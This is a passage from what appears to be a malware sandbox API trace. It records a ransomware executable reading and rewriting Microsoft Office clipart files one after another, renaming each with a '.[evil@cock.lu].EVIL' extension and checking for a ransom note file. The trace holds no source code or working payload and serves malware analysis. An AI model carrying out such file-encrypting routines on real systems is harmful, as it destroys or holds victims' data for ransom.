Office\\root\\CLIPART\\PUB60COR\\J0107138.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107138.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0140.984] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4330, lpOverlapped=0x0) returned 1 [0140.990] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.990] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0140.990] _errno () returned 0x84b1160840 [0140.990] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.990] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x4340, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4340, lpOverlapped=0x0) returned 1 [0140.990] CloseHandle (hObject=0x1a8) returned 1 [0140.990] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107138.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0140.990] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0140.990] __uncaught_exception () returned 0x84b1160800 [0140.990] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0140.991] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107138.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107138.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107138.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107138.wmf.[evil@cock.lu].evil")) returned 1 [0140.991] ??_V@YAXPEAX@Z () returned 0x1 [0140.994] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107138.WMF", dwFileAttributes=0x200) returned 0 [0140.994] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0140.994] wcsstr (_Str="J0107146.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0140.994] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF") returned 69 [0140.994] wcscmp (_String1="J0107146.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0140.994] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107146.WMF") returned 0x0 [0140.994] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF") returned 0x45 [0140.994] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107146.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0140.996] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3a94, lpOverlapped=0x0) returned 1 [0141.008] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.008] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.008] _errno () returned 0x84b1160840 [0141.008] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.008] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x3aa0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3aa0, lpOverlapped=0x0) returned 1 [0141.008] CloseHandle (hObject=0x1a8) returned 1 [0141.008] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.008] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.008] __uncaught_exception () returned 0x84b1160800 [0141.009] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.009] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107146.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107146.wmf.[evil@cock.lu].evil")) returned 1 [0141.009] ??_V@YAXPEAX@Z () returned 0x1 [0141.012] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107146.WMF", dwFileAttributes=0x200) returned 0 [0141.012] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.012] wcsstr (_Str="J0107148.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.012] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF") returned 69 [0141.012] wcscmp (_String1="J0107148.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.012] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107148.WMF") returned 0x0 [0141.012] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF") returned 0x45 [0141.012] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107148.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.014] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x4ea8, lpOverlapped=0x0) returned 1 [0141.024] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.024] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.024] _errno () returned 0x84b1160840 [0141.024] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.024] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x4ec0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x4ec0, lpOverlapped=0x0) returned 1 [0141.024] CloseHandle (hObject=0x1a8) returned 1 [0141.024] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.024] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.024] __uncaught_exception () returned 0x84b1160800 [0141.024] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.025] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107148.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107148.wmf.[evil@cock.lu].evil")) returned 1 [0141.025] ??_V@YAXPEAX@Z () returned 0x1 [0141.028] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107148.WMF", dwFileAttributes=0x200) returned 0 [0141.028] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.028] wcsstr (_Str="J0107150.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.028] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF") returned 69 [0141.028] wcscmp (_String1="J0107150.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.028] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107150.WMF") returned 0x0 [0141.028] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF") returned 0x45 [0141.028] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107150.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.030] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3490, lpOverlapped=0x0) returned 1 [0141.065] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.065] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.065] _errno () returned 0x84b1160840 [0141.065] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.065] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x34a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x34a0, lpOverlapped=0x0) returned 1 [0141.065] CloseHandle (hObject=0x1a8) returned 1 [0141.065] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.065] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.065] __uncaught_exception () returned 0x84b1160800 [0141.065] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.066] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107150.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107150.wmf.[evil@cock.lu].evil")) returned 1 [0141.066] ??_V@YAXPEAX@Z () returned 0x1 [0141.069] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107150.WMF", dwFileAttributes=0x200) returned 0 [0141.069] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.069] wcsstr (_Str="J0107152.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.069] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF") returned 69 [0141.069] wcscmp (_String1="J0107152.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.069] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107152.WMF") returned 0x0 [0141.069] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF") returned 0x45 [0141.069] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107152.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.071] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x5804, lpOverlapped=0x0) returned 1 [0141.113] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.113] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.113] _errno () returned 0x84b1160840 [0141.113] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.113] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x5820, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5820, lpOverlapped=0x0) returned 1 [0141.114] CloseHandle (hObject=0x1a8) returned 1 [0141.114] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.114] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.114] __uncaught_exception () returned 0x84b1160800 [0141.114] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.114] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107152.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107152.wmf.[evil@cock.lu].evil")) returned 1 [0141.115] ??_V@YAXPEAX@Z () returned 0x1 [0141.118] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107152.WMF", dwFileAttributes=0x200) returned 0 [0141.118] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.118] wcsstr (_Str="J0107154.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.118] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF") returned 69 [0141.118] wcscmp (_String1="J0107154.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.118] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107154.WMF") returned 0x0 [0141.118] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF") returned 0x45 [0141.118] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107154.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.120] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x571c, lpOverlapped=0x0) returned 1 [0141.122] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.122] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.122] _errno () returned 0x84b1160840 [0141.122] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.122] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x5720, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x5720, lpOverlapped=0x0) returned 1 [0141.123] CloseHandle (hObject=0x1a8) returned 1 [0141.123] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.123] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.123] __uncaught_exception () returned 0x84b1160800 [0141.123] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.123] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107154.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107154.wmf.[evil@cock.lu].evil")) returned 1 [0141.124] ??_V@YAXPEAX@Z () returned 0x1 [0141.127] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107154.WMF", dwFileAttributes=0x200) returned 0 [0141.127] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.127] wcsstr (_Str="J0107158.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.127] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF") returned 69 [0141.127] wcscmp (_String1="J0107158.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.127] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107158.WMF") returned 0x0 [0141.127] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF") returned 0x45 [0141.127] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107158.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.129] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x614c, lpOverlapped=0x0) returned 1 [0141.131] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.131] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.131] _errno () returned 0x84b1160840 [0141.131] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.131] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x6160, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6160, lpOverlapped=0x0) returned 1 [0141.131] CloseHandle (hObject=0x1a8) returned 1 [0141.132] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.132] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.132] __uncaught_exception () returned 0x84b1160800 [0141.132] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.132] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107158.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107158.wmf.[evil@cock.lu].evil")) returned 1 [0141.133] ??_V@YAXPEAX@Z () returned 0x1 [0141.136] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107158.WMF", dwFileAttributes=0x200) returned 0 [0141.136] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.136] wcsstr (_Str="J0107182.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.136] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF") returned 69 [0141.136] wcscmp (_String1="J0107182.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.136] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107182.WMF") returned 0x0 [0141.136] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF") returned 0x45 [0141.136] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107182.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.138] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x3ee4, lpOverlapped=0x0) returned 1 [0141.146] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.146] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0141.146] _errno () returned 0x84b1160840 [0141.146] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0141.146] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x3f00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3f00, lpOverlapped=0x0) returned 1 [0141.146] CloseHandle (hObject=0x1a8) returned 1 [0141.146] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0141.147] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0141.147] __uncaught_exception () returned 0x84b1160800 [0141.147] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0141.147] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107182.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107182.wmf.[evil@cock.lu].evil")) returned 1 [0141.148] ??_V@YAXPEAX@Z () returned 0x1 [0141.151] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107182.WMF", dwFileAttributes=0x200) returned 0 [0141.151] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0141.151] wcsstr (_Str="J0107188.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0141.151] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF") returned 69 [0141.151] wcscmp (_String1="J0107188.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0141.151] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="J0107188.WMF") returned 0x0 [0141.151] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF") returned 0x45 [0141.151] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107188.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107188.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0141.153] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x11b8, lpOverlapped=0x0) returned 1 [0141.171] 